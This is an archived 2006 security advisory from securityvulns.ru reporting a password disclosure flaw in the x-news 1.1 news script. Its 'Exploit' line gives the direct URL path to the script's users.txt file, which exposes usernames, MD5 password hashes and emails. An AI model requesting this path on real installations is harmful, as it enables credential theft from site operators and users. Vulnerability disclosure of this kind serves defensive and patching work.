Computer Security

Security Advisory: x-news 1.1 Password Disclosure Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Acronym Mod  v0.9.5  Remote SQL Injection Vulnerability

  ASPTicker 1.0 (admin.asp) Remote Login ByPass SQL Injection Vulnerability

  Title   :  WYWO - InOut Board 1.0 Multiple Vulnerabilities

  aFAQ 1.0 (catcode) Remote SQL Injection Vulnerability

From:bd0rk_(at)_hackermail.com <bd0rk_(at)_hackermail.com>
Date:31.12.2006
Subject:x-news 1.1 Password Disclosure Vulnerability

                          x-news 1.1 Password Disclosure Vulnerability


Affected Software: x-news 1.1

x-news Website: http://xqus.com

Bugfounder: bd0rk

Website: www.soh-crew.it.tt

Contact: bd0rk[at]hackermail.com

Greetings: str0ke, Perle, TheJT, ajann

[+]Exploit: http://[target]/[x_news_path]/news/db/users.txt

Showexample: |username|MD5-Hash|eMail|

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server